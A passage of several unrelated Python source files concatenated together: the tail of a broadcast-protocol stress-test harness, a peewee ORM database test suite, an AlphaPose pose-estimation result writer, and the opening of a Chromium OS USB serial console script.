info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING))
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.TERMINATED))
return False
def continueStoppedProcesses(self):
for _, info in self.processesInfo.items():
with info.lock:
if info.state != ProcessState.TERMINATED:
if info.state == ProcessState.STOPPED:
info.handle.send_signal(
ProcessInfo.stateToSignal(ProcessState.RUNNING))
def run(self):
if self.concurrency > 1:
threads = [threading.Thread(target=self.stress)
for _ in range(self.concurrency)]
[p.start() for p in threads]
[p.join() for p in threads]
else:
self.stress()
def startProcesses(processes, runscript, hostsFilePath, configFilePath, outputDir):
runscriptPath = os.path.abspath(runscript)
if not os.path.isfile(runscriptPath):
raise Exception("`{}` is not a file".format(runscriptPath))
if os.path.basename(runscriptPath) != 'run.sh':
raise Exception("`{}` is not a runscript".format(runscriptPath))
outputDirPath = os.path.abspath(outputDir)
if not os.path.isdir(outputDirPath):
raise Exception("`{}` is not a directory".format(outputDirPath))
baseDir, _ = os.path.split(runscriptPath)
bin_cpp = os.path.join(baseDir, "bin", "da_proc")
bin_java = os.path.join(baseDir, "bin", "da_proc.jar")
if os.path.exists(bin_cpp):
cmd = [bin_cpp]
elif os.path.exists(bin_java):
cmd = ['java', '-jar', bin_java]
else:
raise Exception(
"`{}` could not find a binary to execute. Make sure you build before validating".format(runscriptPath))
procs = []
for pid in range(1, processes+1):
cmd_ext = ['--id', str(pid),
'--hosts', hostsFilePath,
'--barrier', '{}:{}'.format(BARRIER_IP, BARRIER_PORT),
'--signal', '{}:{}'.format(SIGNAL_IP, SIGNAL_PORT),
'--output', os.path.join(outputDirPath,
'proc{:02d}.output'.format(pid)),
configFilePath]
stdoutFd = open(os.path.join(
outputDirPath, 'proc{:02d}.stdout'.format(pid)), "w")
stderrFd = open(os.path.join(
outputDirPath, 'proc{:02d}.stderr'.format(pid)), "w")
procs.append((pid, subprocess.Popen(
cmd + cmd_ext, stdout=stdoutFd, stderr=stderrFd)))
return procs
def main(processes, messages, runscript, broadcastType, logsDir, testConfig):
# Set tc for loopback
tc = TC(testConfig['TC'])
print(tc)
# Start the barrier
initBarrier = barrier.Barrier(BARRIER_IP, BARRIER_PORT, processes)
initBarrier.listen()
startTimesFuture = initBarrier.startTimesFuture()
initBarrierThread = threading.Thread(target=initBarrier.wait)
initBarrierThread.start()
# Start the finish signal
finishSignal = finishedSignal.FinishedSignal(
SIGNAL_IP, SIGNAL_PORT, processes)
finishSignal.listen()
finishSignalThread = threading.Thread(target=finishSignal.wait)
finishSignalThread.start()
if broadcastType == "fifo":
validation = FifoBroadcastValidation(processes, messages, logsDir)
else:
validation = LCausalBroadcastValidation(
processes, messages, logsDir, None)
hostsFile, configFile = validation.generateConfig()
try:
# Start the processes and get their PIDs
procs = startProcesses(processes, runscript,
hostsFile.name, configFile.name, logsDir)
# Create the stress test
st = StressTest(procs,
testConfig['ST']['concurrency'],
testConfig['ST']['attempts'],
testConfig['ST']['attemptsDistribution'])
for (logicalPID, procHandle) in procs:
print("Process with logicalPID {} has PID {}".format(
logicalPID, procHandle.pid))
initBarrierThread.join()
print("All processes have been initialized.")
st.run()
print("StressTest is complete.")
print("Resuming stopped processes.")
st.continueStoppedProcesses()
print("Waiting until all running processes have finished broadcasting.")
finishSignalThread.join()
for pid, startTs in OrderedDict(sorted(startTimesFuture.items())).items():
print("Process {} finished broadcasting {} messages in {} ms".format(
pid, messages, finishSignal.endTimestamps()[pid] - startTs))
unterminated = st.remainingUnterminatedProcesses()
if unterminated is not None:
input('Hit `Enter` to terminate the remaining processes with logicalPIDs {}.'.format(
unterminated))
st.terminateAllProcesses()
mutex = threading.Lock()
def waitForProcess(logicalPID, procHandle, mutex):
procHandle.wait()
with mutex:
print("Process {} exited with {}".format(
logicalPID, procHandle.returncode))
# Monitor which processes have exited
monitors = [threading.Thread(target=waitForProcess, args=(
logicalPID, procHandle, mutex)) for (logicalPID, procHandle) in procs]
[p.start() for p in monitors]
[p.join() for p in monitors]
input('Hit `Enter` to validate the output')
print("Result of validation: {}".format(validation.checkAll()))
finally:
if procs is not None:
for _, p in procs:
p.kill()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-r",
"--runscript",
required=True,
dest="runscript",
help="Path to run.sh",
)
parser.add_argument(
"-b",
"--broadcast",
choices=["fifo", "lcausal"],
required=True,
dest="broadcastType",
help="Which broadcast implementation to test",
)
parser.add_argument(
"-l",
"--logs",
required=True,
dest="logsDir",
help="Directory to store stdout, stderr and outputs generated by the processes",
)
parser.add_argument(
"-p",
"--processes",
required=True,
type=int,
dest="processes",
help="Number of processes that broadcast",
)
parser.add_argument(
"-m",
"--messages",
required=True,
type=int,
dest="messages",
help="Maximum number (because it can crash) of messages that each process can broadcast",
)
results = parser.parse_args()
testConfig = {
# Network configuration using the tc command
'TC': {
'delay': ('200ms', '50ms'),
'loss': ('10%', '25%'),
'reordering': ('25%', '50%')
},
# StressTest configuration
'ST': {
'concurrency': 8, # How many threads are interferring with the running processes
'attempts': 8, # How many interferring attempts each threads does
'attemptsDistribution': { # Probability with which an interferring thread will
# select an interferring action (make sure they add up to 1)
'STOP': 0.5,
'CONT': 0.5,
'TERM': 0.0
}
}
}
main(results.processes, results.messages, results.runscript,
results.broadcastType, results.logsDir, testConfig)
|
database.py
|
from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import requires_postgresql
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
database = db_loader('sqlite3')
def test_pragmas(self):
self.database.cache_size = -2048
self.assertEqual(self.database.cache_size, -2048)
self.database.cache_size = -4096
self.assertEqual(self.database.cache_size, -4096)
self.database.foreign_keys = 'on'
self.assertEqual(self.database.foreign_keys, 1)
self.database.foreign_keys = 'off'
self.assertEqual(self.database.foreign_keys, 0)
def test_timeout_semantics(self):
self.assertEqual(self.database.timeout, 5)
self.assertEqual(self.database.pragma('busy_timeout'), 5000)
self.database.timeout = 2.5
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
self.database.close()
self.database.connect()
self.assertEqual(self.database.timeout, 2.5)
self.assertEqual(self.database.pragma('busy_timeout'), 2500)
def test_pragmas_deferred(self):
pragmas = (('journal_mode', 'wal'),)
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
# Test pragmas preserved after initializing.
db.init(':memory:')
self.assertEqual(db._pragmas, pragmas)
db = SqliteDatabase(None)
self.assertEqual(db._pragmas, ())
# Test pragmas are set and subsequently overwritten.
db.init(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragmas)
db.init(':memory:', pragmas=())
self.assertEqual(db._pragmas, ())
# Test when specified twice, the previous value is overwritten.
db = SqliteDatabase(None, pragmas=pragmas)
db.init(':memory:', pragmas=(('cache_size', -8000),))
self.assertEqual(db._pragmas, (('cache_size', -8000),))
def test_pragmas_as_dict(self):
pragmas = {'journal_mode': 'wal'}
pragma_list = [('journal_mode', 'wal')]
db = SqliteDatabase(':memory:', pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
# Test deferred databases correctly handle pragma dicts.
db = SqliteDatabase(None, pragmas=pragmas)
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:')
self.assertEqual(db._pragmas, pragma_list)
db.init(':memory:', pragmas={})
self.assertEqual(db._pragmas, [])
def test_pragmas_permanent(self):
db = SqliteDatabase(':memory:')
db.execute_sql('pragma foreign_keys=0')
self.assertEqual(db.foreign_keys, 0)
db.pragma('foreign_keys', 1, True)
self.assertEqual(db.foreign_keys, 1)
db.close()
db.connect()
self.assertEqual(db.foreign_keys, 1)
def test_context_settings(self):
class TestDatabase(Database):
field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
operations = {'LIKE': '~', 'NEW': '->>'}
param = '$'
test_db = TestDatabase(None)
state = test_db.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], FIELD.INT)
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
self.assertEqual(state.operations['LIKE'], '~')
self.assertEqual(state.operations['NEW'], '->>')
self.assertEqual(state.operations['ILIKE'], 'ILIKE')
self.assertEqual(state.param, '$')
self.assertEqual(state.quote, '""')
test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
'INT': 'XXX_INT'})
state = test_db2.get_sql_context().state
self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
self.assertEqual(state.field_types['INT'], 'XXX_INT')
self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)
def test_connection_state(self):
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
self.database.close()
self.assertTrue(self.database.is_closed())
conn = self.database.connection()
self.assertFalse(self.database.is_closed())
def test_connection_initialization(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
self.assertEqual(state['count'], 0)
conn = db.connection()
self.assertEqual(state['count'], 1)
# Since already connected, nothing happens here.
conn = db.connection()
self.assertEqual(state['count'], 1)
def test_connect_semantics(self):
state = {'count': 0}
class TestDatabase(SqliteDatabase):
def _initialize_connection(self, conn):
state['count'] += 1
db = TestDatabase(':memory:')
db.connect()
self.assertEqual(state['count'], 1)
self.assertRaises(OperationalError, db.connect)
self.assertEqual(state['count'], 1)
self.assertFalse(db.connect(reuse_if_open=True))
self.assertEqual(state['count'], 1)
with db:
self.assertEqual(state['count'], 1)
self.assertFalse(db.is_closed())
self.assertTrue(db.is_closed())
with db:
self.assertEqual(state['count'], 2)
def test_execute_sql(self):
self.database.execute_sql('CREATE TABLE register (val INTEGER);')
self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
(1337, 31337))
cursor = self.database.execute_sql(
'SELECT val FROM register ORDER BY val')
self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
self.database.execute_sql('DROP TABLE register;')
def test_bind_helpers(self):
db = get_in_memory_db()
alt_db = get_in_memory_db()
class Base(Model):
class Meta:
database = db
class A(Base):
a = TextField()
class B(Base):
b = TextField()
db.create_tables([A, B])
# Temporarily bind A to alt_db.
with alt_db.bind_ctx([A]):
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
self.assertTrue(A.table_exists())
self.assertTrue(B.table_exists())
alt_db.bind([A])
self.assertFalse(A.table_exists())
self.assertTrue(B.table_exists())
db.close()
alt_db.close()
def test_batch_commit(self):
class PatchCommitDatabase(SqliteDatabase):
commits = 0
def begin(self): pass
def commit(self):
self.commits += 1
db = PatchCommitDatabase(':memory:')
def assertBatches(n_objs, batch_size, n_commits):
accum = []
source = range(n_objs)
db.commits = 0
for item in db.batch_commit(source, batch_size):
accum.append(item)
self.assertEqual(accum, list(range(n_objs)))
self.assertEqual(db.commits, n_commits)
assertBatches(12, 1, 12)
assertBatches(12, 2, 6)
assertBatches(12, 3, 4)
assertBatches(12, 4, 3)
assertBatches(12, 5, 3)
assertBatches(12, 6, 2)
assertBatches(12, 7, 2)
assertBatches(12, 11, 2)
assertBatches(12, 12, 1)
assertBatches(12, 13, 1)
class TestThreadSafety(ModelTestCase):
nthreads = 4
nrows = 10
requires = [User]
def test_multiple_writers(self):
def create_users(idx):
for i in range(idx * self.nrows, (idx + 1) * self.nrows):
User.create(username='u%d' % i)
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=create_users, args=(i,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(User.select().count(), self.nrows * self.nthreads)
def test_multiple_readers(self):
data = Queue()
def read_user_count(n):
for i in range(n):
data.put(User.select().count())
threads = []
for i in range(self.nthreads):
threads.append(threading.Thread(target=read_user_count,
args=(self.nrows,)))
for t in threads: t.start()
for t in threads: t.join()
self.assertEqual(data.qsize(), self.nrows * self.nthreads)
class TestDeferredDatabase(BaseTestCase):
def test_deferred_database(self):
deferred_db = SqliteDatabase(None)
self.assertTrue(deferred_db.deferred)
class DeferredModel(Model):
class Meta:
database = deferred_db
self.assertRaises(Exception, deferred_db.connect)
query = DeferredModel.select()
self.assertRaises(Exception, query.execute)
deferred_db.init(':memory:')
self.assertFalse(deferred_db.deferred)
conn = deferred_db.connect()
self.assertFalse(deferred_db.is_closed())
DeferredModel._schema.create_all()
self.assertEqual(list(DeferredModel.select()), [])
deferred_db.init(None)
self.assertTrue(deferred_db.deferred)
# The connection was automatically closed.
self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
description = TextField()
class Meta:
schema = 'huey'
@requires_postgresql
class TestSchemaNamespace(ModelTestCase):
requires = [CatToy]
def setUp(self):
with self.database:
self.execute('CREATE SCHEMA huey;')
super(TestSchemaNamespace, self).setUp()
def tearDown(self):
super(TestSchemaNamespace, self).tearDown()
with self.database:
self.execute('DROP SCHEMA huey;')
def test_schema(self):
toy = CatToy.create(description='fur mouse')
toy_db = CatToy.select().where(CatToy.id == toy.id).get()
self.assertEqual(toy.id, toy_db.id)
self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
database = db_loader('sqlite3')
requires = [User]
def test_sqlite_isolation(self):
for username in ('u1', 'u2', 'u3'): User.create(username=username)
new_db = db_loader('sqlite3')
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 3)
self.assertEqual(User.select().count(), 3)
self.assertEqual(User.delete().execute(), 3)
with self.database.atomic():
User.create(username='u4')
User.create(username='u5')
# Second conn does not see the changes.
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Third conn does not see the changes.
new_db2 = db_loader('sqlite3')
curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 0)
# Original connection sees its own changes.
self.assertEqual(User.select().count(), 2)
curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
name = CharField(unique=True)
class IndexedModel(TestModel):
first = CharField()
last = CharField()
dob = DateField()
class Meta:
indexes = (
(('first', 'last', 'dob'), True),
(('first', 'last'), False),
)
class TestIntrospection(ModelTestCase):
requires = [Category, User, UniqueModel, IndexedModel]
def test_table_exists(self):
self.assertTrue(self.database.table_exists(User._meta.table_name))
self.assertFalse(self.database.table_exists('nuggies'))
def test_get_tables(self):
tables = self.database.get_tables()
required = set(m._meta.table_name for m in self.requires)
self.assertTrue(required.issubset(set(tables)))
UniqueModel._schema.drop_all()
tables = self.database.get_tables()
self.assertFalse(UniqueModel._meta.table_name in tables)
def test_get_indexes(self):
indexes = self.database.get_indexes('unique_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('unique_model_pkey', 'PRIMARY')]
self.assertEqual(data, [
('unique_model_name', ['name'], True, 'unique_model')])
indexes = self.database.get_indexes('indexed_model')
data = [(index.name, index.columns, index.unique, index.table)
for index in indexes
if index.name not in ('indexed_model_pkey', 'PRIMARY')]
self.assertEqual(sorted(data), [
('indexed_model_first_last', ['first', 'last'], False,
'indexed_model'),
('indexed_model_first_last_dob', ['first', 'last', 'dob'], True,
'indexed_model')])
def test_get_columns(self):
columns = self.database.get_columns('indexed_model')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('id', False, True, 'indexed_model'),
('first', False, False, 'indexed_model'),
('last', False, False, 'indexed_model'),
('dob', False, False, 'indexed_model')])
columns = self.database.get_columns('category')
data = [(c.name, c.null, c.primary_key, c.table)
for c in columns]
self.assertEqual(data, [
('name', False, True, 'category'),
('parent_id', True, False, 'category')])
def test_get_primary_keys(self):
primary_keys = self.database.get_primary_keys('users')
self.assertEqual(primary_keys, ['id'])
primary_keys = self.database.get_primary_keys('category')
self.assertEqual(primary_keys, ['name'])
@requires_models(User, Tweet, Category)
def test_get_foreign_keys(self):
foreign_keys = self.database.get_foreign_keys('tweet')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('user_id', 'users', 'id', 'tweet')])
foreign_keys = self.database.get_foreign_keys('category')
data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
for fk in foreign_keys]
self.assertEqual(data, [
('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
def test_sort_models(self):
class A(Model):
pass
class B(Model):
a = ForeignKeyField(A)
class C(Model):
b = ForeignKeyField(B)
class D(Model):
c = ForeignKeyField(C)
class E(Model):
pass
models = [A, B, C, D, E]
for list_of_models in permutations(models):
sorted_models = sort_models(list_of_models)
self.assertEqual(sorted_models, models)
class TestDBProxy(BaseTestCase):
def test_db_proxy(self):
db = Proxy()
class BaseModel(Model):
class Meta:
database = db
class User(BaseModel):
username = TextField()
class Tweet(BaseModel):
user = ForeignKeyField(User, backref='tweets')
message = TextField()
sqlite_db = SqliteDatabase(':memory:')
db.initialize(sqlite_db)
self.assertEqual(User._meta.database.database, ':memory:')
self.assertEqual(Tweet._meta.database.database, ':memory:')
self.assertTrue(User._meta.database.is_closed())
self.assertTrue(Tweet._meta.database.is_closed())
sqlite_db.connect()
self.assertFalse(User._meta.database.is_closed())
self.assertFalse(Tweet._meta.database.is_closed())
sqlite_db.close()
class Data(TestModel):
key = TextField()
value = TextField()
class Meta:
schema = 'main'
class TestAttachDatabase(ModelTestCase):
database = db_loader('sqlite3')
requires = [Data]
def test_attach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
# Clone data into the in-memory cache.
class CacheData(Data):
class Meta:
schema = 'cache'
self.assertFalse(CacheData.table_exists())
CacheData.create_table(safe=False)
self.assertTrue(CacheData.table_exists())
(CacheData
.insert_from(Data.select(), fields=[Data.id, Data.key, Data.value])
.execute())
# Update the source data.
query = Data.update({Data.value: Data.value + '-x'})
self.assertEqual(query.execute(), 2)
# Verify the source data was updated.
query = Data.select(Data.key, Data.value).order_by(Data.key)
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "main"."data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1-x', 'v2-x'])
# Verify the cached data reflects the original data, pre-update.
query = (CacheData
.select(CacheData.key, CacheData.value)
.order_by(CacheData.key))
self.assertSQL(query, (
'SELECT "t1"."key", "t1"."value" '
'FROM "cache"."cache_data" AS "t1" '
'ORDER BY "t1"."key"'), [])
self.assertEqual([v for k, v in query.tuples()], ['v1', 'v2'])
database.close()
# On re-connecting, the in-memory database will re-attached.
database.connect()
# Cache-Data table does not exist.
self.assertFalse(CacheData.table_exists())
# Double-check the sqlite master table.
curs = database.execute_sql('select * from cache.sqlite_master;')
self.assertEqual(curs.fetchall(), [])
# Because it's in-memory, the table needs to be re-created.
CacheData.create_table(safe=False)
self.assertEqual(CacheData.select().count(), 0)
# Original data is still there.
self.assertEqual(Data.select().count(), 2)
def test_attach_detach(self):
database = self.database
Data.create(key='k1', value='v1')
Data.create(key='k2', value='v2')
# Attach an in-memory cache database.
database.attach(':memory:', 'cache')
curs = database.execute_sql('select * from cache.sqlite_master')
self.assertEqual(curs.fetchall(), [])
self.assertFalse(database.attach(':memory:', 'cache'))
self.assertRaises(OperationalError, database.attach, 'foo.db', 'cache')
self.assertTrue(database.detach('cache'))
self.assertFalse(database.detach('cache'))
self.assertRaises(OperationalError, database.execute_sql,
'select * from cache.sqlite_master')
def test_sqlite_schema_support(self):
class CacheData(Data):
class Meta:
schema = 'cache'
# Attach an in-memory cache database and create the cache table.
self.database.attach(':memory:', 'cache')
CacheData.create_table()
tables = self.database.get_tables()
self.assertEqual(tables, ['data'])
tables = self.database.get_tables(schema='cache')
self.assertEqual(tables, ['cache_data'])
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
from alphapose.face.face import face_process
from alphapose.hand.hand import handDetect
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
EVAL_JOINTS = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = EVAL_JOINTS
self.save_video = save_video
self.final_result = []
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
self.final_result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
self.final_result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_track:
from PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
if self.opt.face:
from alphapose.face.prnet import PRN
face_3d_model = PRN(self.opt.device)
if self.save_video:
# initialize the file video stream, adapt ouput video resolution to original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
# keep looping infinitelyd
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
self.wait_and_put(self.final_result_queue, None)
if self.save_video:
stream.release()
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
pred = hm_data.cpu().data.numpy()
assert pred.ndim == 4
if hm_data.size()[1] == 49:
self.eval_joints = [*range(0,49)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
### jiasong update 2.24
if self.opt.face:
result = face_process(face_3d_model, result, orig_img)
###
### jiasong update 5.7
if self.opt.hand:
result = handDetect(result, orig_img)
###
result = {
'imgname': im_name,
'result': result
}
# print(result)
if self.opt.pose_track:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
self.wait_and_put(self.final_result_queue, result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, self.opt)
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
self.commit()
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
self.commit()
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
while True:
final_res = self.wait_and_get(self.final_result_queue)
if final_res:
self.final_result.append(final_res)
else:
break
self.result_worker.join()
def clear_queues(self):
self.clear(self.result_queue)
self.clear(self.final_result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def commit(self):
# commit finished final results to main process
while not self.final_result_queue.empty():
self.final_result.append(self.wait_and_get(self.final_result_queue))
def results(self):
# return final result
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
|
console.py
|
#!/usr/bin/env python
# Copyright 2016 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Ignore indention messages, since legacy scripts use 2 spaces instead of 4.
# pylint: disable=bad-indentation,docstring-section-indent
# pylint: disable=docstring-trailing-quotes
"""Allow creation of uart/console interface via usb google serial endpoint."""
# Note: This is a py2/3 compatible file.
from __future__ import print_function
import argparse
import array
import os
import sys
import termios
import threading
import time
import traceback
import tty
try:
import usb
except:
print("import usb failed")
print("try running these commands:")
print(" sudo apt-get install python-pip")
print(" sudo pip install --pre pyusb")
print()
sys.exit(-1)
import six
def GetBuffer(stream):
if six.PY3:
return stream.buffer
return stream
"""Class Susb covers USB device discovery and initialization.
It can find a particular endpoint by vid:pid, serial number,
and interface number.
"""
class SusbError(Exception):
"""Class for exceptions of Susb."""
def __init__(self, msg, value=0):
"""SusbError constructor.
Args:
msg: string, message describing error in detail
value: integer, value of error when non-zero status returned. Default=0
"""
super(SusbError, self).__init__(msg, value)
self.msg = msg
self.value = value
class Susb():
"""Provide USB functionality.
Instance Variables:
_read_ep: pyUSB read endpoint for this interface
_write_ep: pyUSB write endpoint for this interface
"""
READ_ENDPOINT = 0x81
WRITE_ENDPOINT = 0x1
TIMEOUT_MS = 100
def __init__(self, vendor=0x18d1,
product=0x500f, interface=1, serialname=None):
"""Susb constructor.
Discovers and connects to USB endpoints.
Args:
vendor : usb vendor id of device
product : usb product id of device
interface : interface number ( 1 - 8 ) of device to use
serialname: string of device serialnumber.
Raises:
SusbError: An error accessing Susb object
"""
# Find the device.
dev_g = usb.core.find(idVendor=vendor, idProduct=product, find_all=True)
dev_list = list(dev_g)
if dev_list is None:
raise SusbError("USB device not found")
# Check if we have multiple devices.
dev = None
if serialname:
for d in dev_list:
dev_serial = "PyUSB doesn't have a stable interface"
try:
dev_serial = usb.util.get_string(d, 256, d.iSerialNumber)
except:
dev_serial = usb.util.get_string(d, d.iSerialNumber)
if dev_serial == serialname:
dev = d
break
if dev is None:
raise SusbError("USB device(%s) not found" % (serialname,))
else:
try:
dev = dev_list[0]
except:
try:
dev = dev_list.next()
except:
raise SusbError("USB device %04x:%04x not found" % (vendor, product))
# If we can't set configuration, it's already been set.
try:
dev.set_configuration()
except usb.core.USBError:
pass
# Get an endpoint instance.
cfg = dev.get_active_configuration()
intf = usb.util.find_descriptor(cfg, bInterfaceNumber=interface)
self._intf = intf
if not intf:
raise SusbError("Interface not found")
# Detach raiden.ko if it is loaded.
if dev.is_kernel_driver_active(intf.bInterfaceNumber) is True:
dev.detach_kernel_driver(intf.bInterfaceNumber)
read_ep_number = intf.bInterfaceNumber + self.READ_ENDPOINT
read_ep = usb.util.find_descriptor(intf, bEndpointAddress=read_ep_number)
self._read_ep = read_ep
write_ep_number = intf.bInterfaceNumber + self.WRITE_ENDPOINT
write_ep = usb.util.find_descriptor(intf, bEndpointAddress=write_ep_number)
self._write_ep = write_ep
"""Suart class implements a stream interface, to access Google's USB class.
This creates a send and receive thread that monitors USB and console input
and forwards them across. This particular class is hardcoded to stdin/out.
"""
class SuartError(Exception):
"""Class for exceptions of Suart."""
def __init__(self, msg, value=0):
"""SuartError constructor.
Args:
msg: string, message describing error in detail
value: integer, value of error when non-zero status returned. Default=0
"""
super(SuartError, self).__init__(msg, value)
self.msg = msg
self.value = value
class Suart():
"""Provide interface to serial usb endpoint."""
def __init__(self, vendor=0x18d1, product=0x501c, interface=0,
serialname=None):
"""Suart contstructor.
